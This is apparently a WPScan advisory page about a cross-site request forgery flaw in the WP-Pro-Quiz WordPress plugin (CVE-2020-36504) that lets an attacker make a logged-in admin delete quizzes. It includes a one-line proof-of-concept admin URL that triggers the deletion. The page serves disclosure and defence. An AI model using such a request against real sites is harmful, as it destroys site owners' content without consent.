WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP-Pro-Quiz <= 0.37 - Arbitrary Quiz Deletion via CSRF

Description

The plugin does not have CSRF check in place when deleting a quiz, which could allow an attacker to make a logged in admin delete arbitrary quiz on the blog

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpProQuiz&action=delete&id=4

Affects Plugins

wp-pro-quiz
No known fix - plugin closed

References

CVE
CVE-2020-36504
URL
https://medium.com/@hoanhp/0-days-story-1-wp-pro-quiz-2115dd77a6d4

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

HoanHP

Submitter

hoan

Submitter twitter
HoanHP
Verified

Yes

WPVDB ID
83679b90-faa5-454e-924c-89f388eccbd1

Timeline

Publicly Published

2020-06-22 (about 2 years ago)

Added

2020-06-22 (about 2 years ago)

Last Updated

2022-04-08 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin